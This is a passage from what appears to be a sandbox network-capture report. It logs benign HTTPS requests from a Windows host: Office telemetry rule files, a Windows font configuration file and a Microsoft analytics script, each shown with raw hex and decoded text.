                                                                                                                                                                                    2024-11-29 18:49:46 UTC485INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120660" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120659" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                    68192.168.2.64978013.107.246.63443
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2024-11-29 18:49:47 UTC192OUTGET /rules/rule120661v0s19.xml HTTP/1.1
                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                    2024-11-29 18:49:47 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                    Date: Fri, 29 Nov 2024 18:49:47 GMT
                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                    Content-Length: 411
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                                                                                                                                                                    ETag: "0x8DC582B989AF051"
                                                                                                                                                                                    x-ms-request-id: 02827f85-001e-00ad-7091-3f554b000000
                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                    x-azure-ref: 20241129T184947Z-174f78459688l8rvhC1EWRtzr00000000cw000000000dfdr
                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                    2024-11-29 18:49:47 UTC411INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4f 6f 5d 5b 56 76 5d 5b 49 69 5d 5b 52 72 5d 5b 54 74 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d
                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120661" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120659" /> <SR T="2" R="([Oo][Vv][Ii][Rr][Tt])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                    69192.168.2.64978213.107.246.63443
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2024-11-29 18:49:47 UTC192OUTGET /rules/rule120663v0s19.xml HTTP/1.1
                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                    2024-11-29 18:49:47 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                    Date: Fri, 29 Nov 2024 18:49:47 GMT
                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                    Content-Length: 427
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:26:32 GMT
                                                                                                                                                                                    ETag: "0x8DC582BB556A907"
                                                                                                                                                                                    x-ms-request-id: d6e812ca-001e-008d-1b5a-40d91e000000
                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                    x-azure-ref: 20241129T184947Z-174f7845968psccphC1EWRuz9s00000010p00000000032rn
                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                    2024-11-29 18:49:47 UTC427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 50 70 5d 5b 41 61 5d 5b 52 72 5d 5b 41 61 5d 5b 4c 6c 5d 5b 4c 6c 5d 5b 45 65 5d 5b 4c 6c 5d 5b 53 73 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20
                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120663" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120661" /> <SR T="2" R="([Pp][Aa][Rr][Aa][Ll][Ll][Ee][Ll][Ss])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                    70192.168.2.64978113.107.246.63443
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2024-11-29 18:49:47 UTC192OUTGET /rules/rule120662v0s19.xml HTTP/1.1
                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                    2024-11-29 18:49:47 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                    Date: Fri, 29 Nov 2024 18:49:47 GMT
                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                    Content-Length: 470
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:26:42 GMT
                                                                                                                                                                                    ETag: "0x8DC582BBB181F65"
                                                                                                                                                                                    x-ms-request-id: 6dbf519d-601e-0084-1b91-3f6b3f000000
                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                    x-azure-ref: 20241129T184947Z-174f7845968zgtf6hC1EWRqd8s0000000t8g00000000bq8z
                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                    2024-11-29 18:49:47 UTC470INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120662" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120661" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                    71192.168.2.64979313.107.246.63443
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2024-11-29 18:49:48 UTC192OUTGET /rules/rule120664v0s19.xml HTTP/1.1
                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                    2024-11-29 18:49:48 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                    Date: Fri, 29 Nov 2024 18:49:48 GMT
                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                    Content-Length: 502
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT
                                                                                                                                                                                    ETag: "0x8DC582BB6A0D312"
                                                                                                                                                                                    x-ms-request-id: 454be365-001e-0065-3d29-410b73000000
                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                    x-azure-ref: 20241129T184948Z-174f784596886s2bhC1EWR743w00000010dg000000005azs
                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                    2024-11-29 18:49:48 UTC502INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120664" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120663" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                    72192.168.2.6497992.18.84.141443
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2024-11-29 18:49:51 UTC161OUTHEAD /fs/windows/config.json HTTP/1.1
                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                    Accept-Encoding: identity
                                                                                                                                                                                    User-Agent: Microsoft BITS/7.8
                                                                                                                                                                                    Host: fs.microsoft.com
                                                                                                                                                                                    2024-11-29 18:49:52 UTC479INHTTP/1.1 200 OK
                                                                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                                                                    Server: Kestrel
                                                                                                                                                                                    ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                                                                                                                                                                                    Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                                                                                                                                                                                    X-Ms-ApiVersion: Distribute 1.2
                                                                                                                                                                                    X-Ms-Region: prod-weu-z1
                                                                                                                                                                                    Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                                                                                                                                                                                    X-OSID: 2
                                                                                                                                                                                    X-CID: 2
                                                                                                                                                                                    X-CCC: GB
                                                                                                                                                                                    Cache-Control: public, max-age=114600
                                                                                                                                                                                    Date: Fri, 29 Nov 2024 18:49:51 GMT
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    X-CID: 2


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                    73192.168.2.6498002.18.84.141443
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2024-11-29 18:49:53 UTC239OUTGET /fs/windows/config.json HTTP/1.1
                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                    Accept-Encoding: identity
                                                                                                                                                                                    If-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMT
                                                                                                                                                                                    Range: bytes=0-2147483646
                                                                                                                                                                                    User-Agent: Microsoft BITS/7.8
                                                                                                                                                                                    Host: fs.microsoft.com
                                                                                                                                                                                    2024-11-29 18:49:54 UTC515INHTTP/1.1 200 OK
                                                                                                                                                                                    ApiVersion: Distribute 1.1
                                                                                                                                                                                    Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                                                                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                                                                    ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                                                                                                                                                                                    Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                                                                                                                                                                                    Server: ECAcc (lpl/EF06)
                                                                                                                                                                                    X-CID: 11
                                                                                                                                                                                    X-Ms-ApiVersion: Distribute 1.2
                                                                                                                                                                                    X-Ms-Region: prod-weu-z1
                                                                                                                                                                                    Cache-Control: public, max-age=174346
                                                                                                                                                                                    Date: Fri, 29 Nov 2024 18:49:53 GMT
                                                                                                                                                                                    Content-Length: 55
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    X-CID: 2
                                                                                                                                                                                    2024-11-29 18:49:54 UTC55INData Raw: 7b 22 66 6f 6e 74 53 65 74 55 72 69 22 3a 22 66 6f 6e 74 73 65 74 2d 32 30 31 37 2d 30 34 2e 6a 73 6f 6e 22 2c 22 62 61 73 65 55 72 69 22 3a 22 66 6f 6e 74 73 22 7d
                                                                                                                                                                                    Data Ascii: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                    74192.168.2.64980513.107.246.63443940C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2024-11-29 18:49:54 UTC549OUTGET /scripts/c/ms.jsll-4.min.js HTTP/1.1
                                                                                                                                                                                    Host: js.monitor.azure.com
                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                    Sec-Fetch-Site: cross-site
                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                    Sec-Fetch-Dest: script
                                                                                                                                                                                    Referer: https://learn.microsoft.com/
                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                    2024-11-29 18:49:55 UTC889INHTTP/1.1 200 OK
                                                                                                                                                                                    Date: Fri, 29 Nov 2024 18:49:54 GMT
                                                                                                                                                                                    Content-Type: text/javascript; charset=utf-8
                                                                                                                                                                                    Content-Length: 207935
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                    Cache-Control: no-transform, public, max-age=1800, immutable
                                                                                                                                                                                    Last-Modified: Mon, 14 Oct 2024 17:27:31 GMT
                                                                                                                                                                                    ETag: 0x8DCEC757C1AD1D1
                                                                                                                                                                                    x-ms-request-id: 24663fe8-301e-00d3-0bb2-2cfca8000000
                                                                                                                                                                                    x-ms-version: 2009-09-19
                                                                                                                                                                                    x-ms-meta-jssdkver: 4.3.3
                                                                                                                                                                                    x-ms-meta-jssdksrc: [cdn]/scripts/c/ms.jsll-4.3.3.min.js
                                                                                                                                                                                    Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,x-ms-meta-jssdkver,x-ms-meta-jssdksrc,Content-Type,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                                                                                                                                                    Access-Control-Allow-Origin: *
                                                                                                                                                                                    x-azure-ref: 20241129T184954Z-174f7845968ljs8phC1EWRe6en000000104000000000esc7
                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                    X-Cache-Info: L1_T2
                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                    2024-11-29 18:49:55 UTC15495INData Raw: 2f 2a 21 0a 20 2a 20 31 44 53 20 4a 53 4c 4c 20 53 4b 55 2c 20 34 2e 33 2e 33 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 63 29 20 4d 69 63 72 6f 73 6f 66 74 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 2e 20 41 6c 6c 20 72 69 67 68 74 73 20 72 65 73 65 72 76 65 64 2e 0a 20 2a 20 28 4d 69 63 72 6f 73 6f 66 74 20 49 6e 74 65 72 6e 61 6c 20 4f 6e 6c 79 29 0a 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 3d 22 75 6e 64 65 66 69 6e 65 64 22 3b 69 66 28 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 26 26 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 21 3d 6e 29 74 28 65 78 70 6f 72 74 73 29 3b 65 6c 73 65 20 69 66 28 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69
                                                                                                                                                                                    Data Ascii: /*! * 1DS JSLL SKU, 4.3.3 * Copyright (c) Microsoft and contributors. All rights reserved. * (Microsoft Internal Only) */!function(e,t){var n="undefined";if("object"==typeof exports&&typeof module!=n)t(exports);else if("function"==typeof define&&defi
                                                                                                                                                                                    2024-11-29 18:49:55 UTC16384INData Raw: 28 69 29 3a 28 72 3d 66 65 28 22 63 6f 6e 73 6f 6c 65 22 29 29 26 26 28 72 2e 65 72 72 6f 72 7c 7c 72 2e 6c 6f 67 29 28 74 2c 63 65 28 69 29 29 29 29 7d 53 65 28 61 3d 7b 74 68 65 6e 3a 6f 2c 22 63 61 74 63 68 22 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 6f 28 75 6e 64 65 66 69 6e 65 64 2c 65 29 7d 2c 22 66 69 6e 61 6c 6c 79 22 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 3d 74 2c 6e 3d 74 3b 72 65 74 75 72 6e 20 51 28 74 29 26 26 28 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 74 26 26 74 28 29 2c 65 7d 2c 6e 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 74 68 72 6f 77 20 74 26 26 74 28 29 2c 65 7d 29 2c 6f 28 65 2c 6e 29 7d 7d 2c 22 73 74 61 74 65 22 2c 7b 67 65 74 3a 64 7d 29 2c 68 74 28 29 26 26 28 61 5b 6d 74 28
                                                                                                                                                                                    Data Ascii: (i):(r=fe("console"))&&(r.error||r.log)(t,ce(i))))}Se(a={then:o,"catch":function(e){return o(undefined,e)},"finally":function(t){var e=t,n=t;return Q(t)&&(e=function(e){return t&&t(),e},n=function(e){throw t&&t(),e}),o(e,n)}},"state",{get:d}),ht()&&(a[mt(
                                                                                                                                                                                    2024-11-29 18:49:55 UTC16384INData Raw: 28 65 2c 74 2c 6e 2c 72 29 7b 67 65 28 65 2c 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 26 26 65 5b 74 5d 26 26 28 6e 3f 28 6e 2e 63 62 5b 74 65 5d 28 7b 66 6e 3a 72 2c 61 72 67 3a 65 7d 29 2c 6e 2e 68 3d 6e 2e 68 7c 7c 6e 6e 28 70 63 2c 30 2c 6e 29 29 3a 4d 28 72 2c 5b 65 5d 29 29 7d 29 7d 68 63 2e 5f 5f 69 65 44 79 6e 3d 31 3b 76 61 72 20 76 63 3d 68 63 3b 66 75 6e 63 74 69 6f 6e 20 68 63 28 65 29 7b 74 68 69 73 2e 6c 69 73 74 65 6e 65 72 73 3d 5b 5d 3b 76 61 72 20 6e 2c 69 3d 5b 5d 2c 61 3d 7b 68 3a 6e 75 6c 6c 2c 63 62 3a 5b 5d 7d 2c 6f 3d 76 6f 28 65 2c 64 63 29 5b 4b 6e 5d 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 6e 3d 21 21 65 2e 63 66 67 2e 70 65 72 66 45 76 74 73 53 65 6e 64 41 6c 6c 7d 29 3b 76 65 28 68 63 2c 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28
                                                                                                                                                                                    Data Ascii: (e,t,n,r){ge(e,function(e){e&&e[t]&&(n?(n.cb[te]({fn:r,arg:e}),n.h=n.h||nn(pc,0,n)):M(r,[e]))})}hc.__ieDyn=1;var vc=hc;function hc(e){this.listeners=[];var n,i=[],a={h:null,cb:[]},o=vo(e,dc)[Kn](function(e){n=!!e.cfg.perfEvtsSendAll});ve(hc,this,function(
                                                                                                                                                                                    2024-11-29 18:49:55 UTC16384INData Raw: 28 65 2c 66 75 6e 63 74 69 6f 6e 28 65 29 7b 61 2e 66 6c 75 73 68 43 6f 6d 70 6c 65 74 65 3d 65 2c 50 3d 21 30 2c 52 2e 72 75 6e 28 6f 2c 61 29 2c 66 5b 67 72 5d 28 29 2c 6f 5b 6c 72 5d 28 61 29 7d 2c 36 2c 6e 29 2c 69 7d 2c 66 5b 6f 72 5d 3d 73 2c 66 2e 61 64 64 50 6c 75 67 69 6e 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 2c 72 29 7b 69 66 28 21 65 29 72 65 74 75 72 6e 20 72 26 26 72 28 21 31 29 2c 76 6f 69 64 20 43 28 6f 75 29 3b 76 61 72 20 69 3d 73 28 65 5b 24 6e 5d 29 3b 69 66 28 69 26 26 21 74 29 72 65 74 75 72 6e 20 72 26 26 72 28 21 31 29 2c 76 6f 69 64 20 43 28 22 50 6c 75 67 69 6e 20 5b 22 2b 65 5b 24 6e 5d 2b 22 5d 20 69 73 20 61 6c 72 65 61 64 79 20 6c 6f 61 64 65 64 21 22 29 3b 76 61 72 20 61 2c 6f 3d 7b 72 65 61 73 6f 6e 3a 31 36 7d 3b 66
                                                                                                                                                                                    Data Ascii: (e,function(e){a.flushComplete=e,P=!0,R.run(o,a),f[gr](),o[lr](a)},6,n),i},f[or]=s,f.addPlugin=function(e,t,n,r){if(!e)return r&&r(!1),void C(ou);var i=s(e[$n]);if(i&&!t)return r&&r(!1),void C("Plugin ["+e[$n]+"] is already loaded!");var a,o={reason:16};f
                                                                                                                                                                                    2024-11-29 18:49:55 UTC16384INData Raw: 6c 3a 31 2c 43 72 69 74 69 63 61 6c 3a 32 7d 29 2c 75 6e 64 65 66 69 6e 65 64 2c 75 6e 64 65 66 69 6e 65 64 29 2c 53 6c 3d 22 22 3b 66 75 6e 63 74 69 6f 6e 20 78 6c 28 65 29 7b 74 72 79 7b 69 66 28 6f 65 28 6f 74 28 29 29 29 72 65 74 75 72 6e 20 6e 75 6c 6c 3b 76 61 72 20 74 3d 28 6e 65 77 20 44 61 74 65 29 5b 4f 73 5d 28 29 2c 6e 3d 66 65 28 65 3d 3d 3d 45 6c 2e 4c 6f 63 61 6c 53 74 6f 72 61 67 65 3f 22 6c 6f 63 61 6c 53 74 6f 72 61 67 65 22 3a 22 73 65 73 73 69 6f 6e 53 74 6f 72 61 67 65 22 29 2c 72 3d 53 6c 2b 74 2c 69 3d 28 6e 2e 73 65 74 49 74 65 6d 28 72 2c 74 29 2c 6e 2e 67 65 74 49 74 65 6d 28 72 29 21 3d 3d 74 29 3b 69 66 28 6e 5b 52 73 5d 28 72 29 2c 21 69 29 72 65 74 75 72 6e 20 6e 7d 63 61 74 63 68 28 61 29 7b 7d 72 65 74 75 72 6e 20 6e 75 6c
                                                                                                                                                                                    Data Ascii: l:1,Critical:2}),undefined,undefined),Sl="";function xl(e){try{if(oe(ot()))return null;var t=(new Date)[Os](),n=fe(e===El.LocalStorage?"localStorage":"sessionStorage"),r=Sl+t,i=(n.setItem(r,t),n.getItem(r)!==t);if(n[Rs](r),!i)return n}catch(a){}return nul
                                                                                                                                                                                    2024-11-29 18:49:55 UTC16384INData Raw: 6f 20 74 72 61 63 6b 20 70 61 67 65 20 76 69 73 69 74 20 74 69 6d 65 20 66 61 69 6c 65 64 2c 20 6d 65 74 72 69 63 20 77 69 6c 6c 20 6e 6f 74 20 62 65 20 63 6f 6c 6c 65 63 74 65 64 3a 20 22 2b 63 65 28 72 29 29 7d 7d 2c 59 28 65 2c 22 5f 6c 6f 67 67 65 72 22 2c 7b 67 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 6f 7d 7d 29 2c 59 28 65 2c 22 70 61 67 65 56 69 73 69 74 54 69 6d 65 54 72 61 63 6b 69 6e 67 48 61 6e 64 6c 65 72 22 2c 7b 67 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 63 7d 7d 29 7d 29 7d 76 61 72 20 4e 64 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 74 68 69 73 5b 67 64 5d 3d 50 74 28 29 2c 74 68 69 73 2e 70 61 67 65 4e 61 6d 65 3d 65 2c 74 68 69 73 2e 70 61 67 65 55 72 6c 3d 74 7d 2c 44 64 3d 66 75 6e 63 74 69 6f 6e 28
                                                                                                                                                                                    Data Ascii: o track page visit time failed, metric will not be collected: "+ce(r))}},Y(e,"_logger",{g:function(){return o}}),Y(e,"pageVisitTimeTrackingHandler",{g:function(){return c}})})}var Nd=function(e,t){this[gd]=Pt(),this.pageName=e,this.pageUrl=t},Dd=function(
